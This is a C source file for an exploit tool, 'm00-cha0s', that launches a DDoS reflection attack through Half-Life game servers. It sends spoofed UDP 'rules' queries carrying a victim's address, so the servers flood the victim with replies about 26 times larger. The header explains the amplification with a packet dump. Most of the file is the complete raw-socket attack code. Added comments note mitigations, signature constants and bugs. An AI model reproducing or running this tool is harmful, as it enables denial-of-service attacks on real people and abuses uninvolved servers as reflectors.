/*
* m00-cha0s.c
*
* Remote exploit for HalfLife servers that allows you to DDoS via them.
*
* Usage: ./m00-cha0s <victim_ip> <victim_port> <file_with_HL_servers> <# of packets>
* Servers and ports in <file_with_HL_servers> must be in colon-separated <server>:<port> format, one entry per line.
*
* WARNING:
* 1. you need root privileges to use it (raw sockets..).
* 2. on some systems (e.g. Fedora Linux) there is a problem resolving hosts read from the HL server list.
* I don't know why yet, but I'm working on it.
* 3. victim_port must be >1024
*
* Vulnerability and exploit code by d4rkgr3y [d4rk@securitylab.ru] // m00.void.ru
*
* Private m00 exploit code. Keep it private or die bitch.
*/
/*
* Vulnerability info
* Actually, information about the possibility of DoS via game servers has been on bugtraq for a while.
* I (like everyone else) paid no attention to those posts until I ran into the problem myself.
* HL servers understand a "rules" query. The server answers it with a detailed listing of its
* configuration variables, sent back to whatever source address the query carried. Example:
*
* client ask:
* 0x0000 BA 87 20 00 05 00 00 00-05 00 00 00 08 00 45 00 ?‡ ...........E.
* 0x0010 00 26 10 FB 00 00 C8 11-91 45 51 D3 29 32 D4 7A .&.u..E.‘EQO)2Oz
* 0x0020 01 07 0C C9 69 87 00 12-E7 17 FF FF FF FF 72 75 ...Ei‡..c.yyyyru
* 0x0030 6C 65 73 00 les.
* #Size 52b
*
* server reply:
* 0x0000 00 00 05 00 00 00 BA 87-20 00 05 00 08 00 45 00 ......?‡ .....E.
* 0x0010 05 44 9F FB 00 00 33 11-92 27 D4 7A 01 07 51 D3 .DYu..3.’'Oz..QO
* 0x0020 29 32 69 87 0C C9 05 30-D0 64 FF FF FF FF 45 4D )2i‡.E.0?dyyyyEM
* 0x0030 00 73 79 73 5F 74 69 63-72 61 74 65 00 35 30 30 .sys_ticrate.500
* 0x0040 2E 30 30 30 30 30 30 00-6D 70 5F 6C 6F 67 66 69 .000000.mp_logfi
* 0x0050 6C 65 00 31 00 64 65 61-74 68 6D 61 74 63 68 00 le.1.deathmatch.
* 0x0060 31 00 63 6F 6F 70 00 30-00 70 61 75 73 61 62 6C 1.coop.0.pausabl
* 0x0070 65 00 30 00 73 76 5F 76-6F 69 63 65 65 6E 61 62 e.0.sv_voiceenab
* 0x0080 6C 65 00 31 00 6D 70 5F-63 6F 6E 73 69 73 74 65 le.1.mp_consiste
* 0x0090 6E 63 79 00 31 00 73 76-5F 63 6F 6E 74 61 63 74 ncy.1.sv_contact
* 0x00A0 00 00 73 76 5F 6D 61 78-75 70 64 61 74 65 72 61 ..sv_maxupdatera
* 0x00B0 74 65 00 31 30 30 2E 30-30 30 30 30 30 00 73 76 te.100.000000.sv
* 0x00C0 5F 70 72 6F 78 69 65 73-00 32 00 73 76 5F 70 61 _proxies.2.sv_pa
* 0x00D0 73 73 77 6F 72 64 00 30-00 73 76 5F 61 69 6D 00 ssword.0.sv_aim.
* 0x00E0 30 00 73 76 5F 67 72 61-76 69 74 79 00 38 30 30 0.sv_gravity.800
* 0x00F0 00 73 76 5F 66 72 69 63-74 69 6F 6E 00 34 2E 30 .sv_friction.4.0
* 0x0100 30 30 30 30 30 00 65 64-67 65 66 72 69 63 74 69 00000.edgefricti
* 0x0110 6F 6E 00 32 00 73 76 5F-73 74 6F 70 73 70 65 65 on.2.sv_stopspee
* 0x0120 64 00 37 35 2E 30 30 30-30 30 30 00 73 76 5F 6D d.75.000000.sv_m
* 0x0130 61 78 73 70 65 65 64 00-33 32 30 00 6D 70 5F 66 axspeed.320.mp_f
* 0x0140 6F 6F 74 73 74 65 70 73-00 31 00 73 76 5F 61 63 ootsteps.1.sv_ac
* 0x0150 63 65 6C 65 72 61 74 65-00 35 2E 30 30 30 30 30 celerate.5.00000
* 0x0160 30 00 73 76 5F 73 74 65-70 73 69 7A 65 00 31 38 0.sv_stepsize.18
* 0x0170 00 73 76 5F 63 6C 69 70-6D 6F 64 65 00 30 00 73 .sv_clipmode.0.s
* 0x0180 76 5F 62 6F 75 6E 63 65-00 31 00 73 76 5F 61 69 v_bounce.1.sv_ai
* 0x0190 72 6D 6F 76 65 00 31 00-73 76 5F 61 69 72 61 63 rmove.1.sv_airac
* 0x01A0 63 65 6C 65 72 61 74 65-00 31 2E 35 00 73 76 5F celerate.1.5.sv_
* 0x01B0 77 61 74 65 72 61 63 63-65 6C 65 72 61 74 65 00 wateraccelerate.
* 0x01C0 31 30 00 73 76 5F 77 61-74 65 72 66 72 69 63 74 10.sv_waterfrict
* 0x01D0 69 6F 6E 00 31 00 73 76-5F 63 6C 69 65 6E 74 74 ion.1.sv_clientt
* 0x01E0 72 61 63 65 00 31 00 73-76 5F 63 68 65 61 74 73 race.1.sv_cheats
* 0x01F0 00 30 00 73 76 5F 61 6C-6C 6F 77 75 70 6C 6F 61 .0.sv_allowuploa
* 0x0200 64 00 30 00 73 76 5F 6D-69 6E 72 61 74 65 00 30 d.0.sv_minrate.0
* 0x0210 00 73 76 5F 6D 61 78 72-61 74 65 00 34 30 30 30 .sv_maxrate.4000
* 0x0220 00 72 65 73 65 72 76 65-5F 73 6C 6F 74 73 00 31 .reserve_slots.1
* 0x0230 00 73 65 72 76 65 72 5F-66 70 73 00 38 37 2E 30 .server_fps.87.0
* 0x0240 30 30 30 30 30 00 62 6F-6F 73 74 65 72 5F 76 65 00000.booster_ve
* 0x0250 72 73 69 6F 6E 00 31 2E-33 33 00 73 74 61 74 73 rsion.1.33.stats
* 0x0260 6D 65 5F 76 65 72 73 69-6F 6E 00 32 2E 36 2E 34 me_version.2.6.4
* 0x0270 00 61 64 6D 69 6E 5F 68-69 67 68 6C 61 6E 64 65 .admin_highlande
* 0x0280 72 00 30 00 61 64 6D 69-6E 5F 69 67 6E 6F 72 65 r.0.admin_ignore
* 0x0290 5F 69 6D 6D 75 6E 69 74-79 00 30 00 61 64 6D 69 _immunity.0.admi
* 0x02A0 6E 5F 71 75 69 65 74 00-30 00 61 64 6D 69 6E 5F n_quiet.0.admin_
* 0x02B0 6D 6F 64 5F 76 65 72 73-69 6F 6E 00 32 35 30 32 mod_version.2502
* 0x02C0 36 61 20 28 4D 4D 29 00-61 6C 6C 6F 77 5F 63 6C 6a (MM).allow_cl
* 0x02D0 69 65 6E 74 5F 65 78 65-63 00 31 00 61 6D 76 5F ient_exec.1.amv_
* 0x02E0 70 72 69 76 61 74 65 5F-73 65 72 76 65 72 00 30 private_server.0
* 0x02F0 00 64 65 66 61 75 6C 74-5F 61 63 63 65 73 73 00 .default_access.
* 0x0300 30 00 70 75 62 6C 69 63-5F 73 6C 6F 74 73 5F 66 0.public_slots_f
* 0x0310 72 65 65 00 38 2E 30 30-30 30 30 30 00 72 65 73 ree.8.000000.res
* 0x0320 65 72 76 65 5F 74 79 70-65 00 30 00 6D 70 5F 74 erve_type.0.mp_t
* 0x0330 69 6D 65 6C 69 6D 69 74-00 33 30 00 6D 70 5F 66 imelimit.30.mp_f
* 0x0340 72 69 65 6E 64 6C 79 66-69 72 65 00 31 00 6D 70 riendlyfire.1.mp
* 0x0350 5F 66 6C 61 73 68 6C 69-67 68 74 00 31 00 64 65 _flashlight.1.de
* 0x0360 63 61 6C 66 72 65 71 75-65 6E 63 79 00 33 30 00 calfrequency.30.
* 0x0370 6D 70 5F 61 6C 6C 6F 77-6D 6F 6E 73 74 65 72 73 mp_allowmonsters
* 0x0380 00 30 00 6D 70 5F 72 6F-75 6E 64 74 69 6D 65 00 .0.mp_roundtime.
* 0x0390 34 00 6D 70 5F 62 75 79-74 69 6D 65 00 31 00 6D 4.mp_buytime.1.m
* 0x03A0 70 5F 66 72 65 65 7A 65-74 69 6D 65 00 35 00 6D p_freezetime.5.m
* 0x03B0 70 5F 63 34 74 69 6D 65-72 00 34 35 00 6D 70 5F p_c4timer.45.mp_
* 0x03C0 67 68 6F 73 74 66 72 65-71 75 65 6E 63 79 00 30 ghostfrequency.0
* 0x03D0 2E 31 00 6D 70 5F 61 75-74 6F 6B 69 63 6B 00 30 .1.mp_autokick.0
* 0x03E0 00 73 76 5F 72 65 73 74-61 72 74 72 6F 75 6E 64 .sv_restartround
* 0x03F0 00 30 00 73 76 5F 72 65-73 74 61 72 74 00 30 00 .0.sv_restart.0.
* 0x0400 6D 70 5F 6C 69 6D 69 74-74 65 61 6D 73 00 32 00 mp_limitteams.2.
* 0x0410 6D 70 5F 61 75 74 6F 74-65 61 6D 62 61 6C 61 6E mp_autoteambalan
* 0x0420 63 65 00 31 00 6D 70 5F-74 6B 70 75 6E 69 73 68 ce.1.mp_tkpunish
* 0x0430 00 30 00 6D 70 5F 68 6F-73 74 61 67 65 70 65 6E .0.mp_hostagepen
* 0x0440 61 6C 74 79 00 30 00 6D-70 5F 6D 69 72 72 6F 72 alty.0.mp_mirror
* 0x0450 64 61 6D 61 67 65 00 30-00 6D 70 5F 6C 6F 67 6D damage.0.mp_logm
* 0x0460 65 73 73 61 67 65 73 00-31 00 6D 70 5F 66 6F 72 essages.1.mp_for
* 0x0470 63 65 63 61 6D 65 72 61-00 30 00 6D 70 5F 66 6F cecamera.0.mp_fo
* 0x0480 72 63 65 63 68 61 73 65-63 61 6D 00 30 00 6D 70 rcechasecam.0.mp
* 0x0490 5F 6D 61 70 76 6F 74 65-72 61 74 69 6F 00 30 2E _mapvoteratio.0.
* 0x04A0 36 00 6D 70 5F 6D 61 78-72 6F 75 6E 64 73 00 30 6.mp_maxrounds.0
* 0x04B0 00 6D 70 5F 77 69 6E 6C-69 6D 69 74 00 30 00 6D .mp_winlimit.0.m
* 0x04C0 70 5F 66 61 64 65 74 6F-62 6C 61 63 6B 00 30 00 p_fadetoblack.0.
* 0x04D0 6D 70 5F 6C 6F 67 64 65-74 61 69 6C 00 30 00 6D mp_logdetail.0.m
* 0x04E0 70 5F 73 74 61 72 74 6D-6F 6E 65 79 00 38 30 30 p_startmoney.800
* 0x04F0 00 6D 70 5F 70 6C 61 79-65 72 69 64 00 30 00 61 .mp_playerid.0.a
* 0x0500 6C 6C 6F 77 5F 73 70 65-63 74 61 74 6F 72 73 00 llow_spectators.
* 0x0510 31 00 6D 70 5F 63 68 61-74 74 69 6D 65 00 31 30 1.mp_chattime.10
* 0x0520 00 6D 70 5F 6B 69 63 6B-70 65 72 63 65 6E 74 00 .mp_kickpercent.
* 0x0530 30 2E 36 36 00 6D 70 5F-66 72 61 67 73 6C 65 66 0.66.mp_fragslef
* 0x0540 74 00 30 00 6D 70 5F 74-69 6D 65 6C 65 66 74 00 t.0.mp_timeleft.
* 0x0550 30 00 0.
* #Size 1362b!!!
*
* Sorry for the dump, but it shows how large the server's answer is relative to the query.
* We send ~52 bytes on the wire (14-byte Ethernet header plus a 38-byte IP datagram), and the server
* replies with ~1362 bytes.
* That is an amplification factor of roughly 26 at the frame level, and far higher (about 130x) if only
* the UDP payload is counted: 10 bytes in, ~1320 bytes out. Because the query is UDP and the source
* address can be spoofed, any HL server on the Internet, regardless of version or configuration, can be
* turned into a reflector against a dial-up user (and not only dial-up).
* (From the defender's side this is the classic unauthenticated-UDP reflection pattern: the fix is
* source-address validation at the network edge and rate-limiting of query replies on the server.)
* If that wasn't clear, the idea is:
* We send a UDP datagram with a spoofed source address (our target's IP) containing:
* "\xFF\xFF\xFF\xFF\x72\x75\x6C\x65\x73\x00" (four 0xFF prefix bytes followed by "rules\0")
* The server replies to that source address with a datagram roughly 26 times larger than ours.
* Just imagine how little we send and how much our target receives.
*
* So this exploit code sends many spoofed UDP datagrams to the listed HL servers, which then send
* their (much larger) replies to the victim.
*
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <stdio.h>
/*
 * main - builds one raw IPv4/UDP "rules" query whose IP source address is the
 * victim and whose destination is each HL server read from the list file, and
 * transmits it over a raw socket until the packet counter reaches <# of packets>.
 *
 * argv[1]  victim host (resolved with gethostbyname(); becomes the IP source address)
 * argv[2]  victim port (becomes the UDP source port, so the server's reply lands there)
 * argv[3]  file of "host:port" lines, one HL server per line
 * argv[4]  packet count (atoi(); no validation)
 *
 * Return: implicit int (K&R-style declaration, no return type). Every exit path,
 * including the error paths after perror(), calls exit(0).
 *
 * Notes for readers:
 *  - The datagram template is sent with its IP header checksum (bytes 10-11) and
 *    UDP checksum (bytes 26-27) left zero; nothing in this file computes either.
 *  - Every packet this tool emits shares a fixed IP ID (0x1234), TTL 255, a 38-byte
 *    total length, a zero UDP checksum and the 10-byte payload FF FF FF FF "rules\0";
 *    those constants are what a network signature for this traffic can key on.
 *  - exit(), atoi() and close() are called without <stdlib.h>/<unistd.h> being
 *    included; the file relies on implicit declarations.
 */
main(int argc,char **argv) {
char buf[100],buf1[100],buf2[10]; /* buf: current list line; buf1: port text after ':'; buf2 is never used */
int port; /* HL server port parsed from the current list line */
int fd; /* raw socket, opened and closed once per datagram */
int sent=0; /* packet counter (incremented in both loops, see below) */
int i; /* unused */
long count; /* requested number of packets (argv[4]) */
struct sockaddr sa; /* sendto() destination, filled through p */
struct sockaddr_in *p;
struct hostent *he;
FILE *hl_lst; /* the HL server list (argv[3]) */
/*
 * Raw IPv4 + UDP datagram template: 20 + 8 + 10 bytes = 38 (0x26).
 * Addresses and ports are patched in at byte offsets 12, 16, 20 and 22
 * before each send.
 */
u_char gram[]= {
0x45, 0x00, 0x00, 0x26, /* IPv4, IHL 5, TOS 0, total length 38 */
0x12, 0x34, 0x00, 0x00, /* IP ID 0x1234 (constant), flags/fragment offset 0 */
0xFF, 0x11, 0x00, 0x00, /* TTL 255, protocol 17 (UDP), header checksum 0 (never computed) */
0x00, 0x00, 0x00, 0x00, /* source IP: overwritten with the victim's address (spoofed) */
0x00, 0x00, 0x00, 0x00, /* destination IP: overwritten with the HL server's address */
0x00, 0x00, 0x00, 0x00, /* UDP source port (victim's) and UDP destination port (server's) */
0x00, 0x12, 0x00, 0x00, /* UDP length 18, UDP checksum 0 (never computed) */
0xFF, 0xFF, 0xFF, 0xFF, /* payload: four 0xFF prefix bytes ... */
0x72, 0x75, 0x6C, 0x65, /* ... followed by "rules" ... */
0x73, 0x00 /* ... and its terminating NUL */
};
printf("\nm00-cha0s.c ~ read the header bitch ~ m00.void.ru\nInternal m00 release. Do not distribute.\n\n");
if(argc!=5) { printf("Usage: %s <IP> <port> <file_with_HL_server> <# of packets>\n\n",argv[0]); exit(1); }
count=atoi(argv[4]); /* no range check; count is a long but is printed with %i below */
if((he=gethostbyname(argv[1]))==NULL) { perror("[-] gethostbyname() #1"); exit(0); }
bcopy(*(he->h_addr_list),(gram+12),4); /* the victim's first address becomes the spoofed IP source */
printf("* Attacking host %s\n* Number of packets %i\n* GO GO GO...\n",argv[1],count);
printf("* Packets sent: %i\r",sent);
/* The outer loop re-reads the whole server list until the counter reaches count. */
for (sent=0;sent<count;sent++) {
if((hl_lst = fopen(argv[3], "r")) == 0) { perror("[-] fopen()"); exit(0); }
while(fgets(buf,100,hl_lst)) {
buf[strlen(buf)-1]='\x00'; /* drops the last character, assumed to be the newline (a final line without one loses its last digit) */
memcpy(buf1,strchr(buf,':')+1,5); /* copies 5 bytes after ':'; with no ':' strchr()+1 is an invalid pointer, and a 5-character port leaves buf1 without a terminator */
buf[strlen(buf)-strlen(buf1)]='\x00'; /* cuts buf back to the host part, possibly leaving the ':' in place */
port=atoi(buf1);
if(buf[strlen(buf)-1]==':') buf[strlen(buf)-1]='\x00'; /* strip a trailing ':' left by the cut above */
//printf("%s %d\n",buf,port);
//if((gram[16]=inet_addr(buf))==-1) {
if((he=gethostbyname(buf))==NULL) { perror("[-] gethostbyname() #2"); continue; } /* unresolvable entries are skipped */
bcopy(*(he->h_addr_list),(gram+16),4); /* the HL server becomes the IP destination */
//}
*(u_short*)(gram+20)=htons((u_short)atoi(argv[2])); /* UDP source port = victim port, so the reply is addressed there */
*(u_short*)(gram+22)=htons((u_short)port); /* UDP destination port = HL server port */
p=(struct sockaddr_in*)&sa;
p->sin_family=AF_INET;
bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr)); /* sin_port is never set */
if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1) { perror("[-] socket()"); exit(0); } /* a fresh raw socket per datagram; needs privileges (see header) */
if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct sockaddr)))==-1) { perror("[-] sendto()"); break; } /* break leaves only the while; the for loop reopens the list and continues */
sent++; /* the for loop increments sent as well, so the counter overshoots by one per pass over the list */
close(fd);
printf("* Packets sent: %i\r",sent);
fflush(stdout);
if(sent==count) { printf("\n"); exit(0); } /* hl_lst is not fclose()d on this path */
}
fclose(hl_lst);
}
}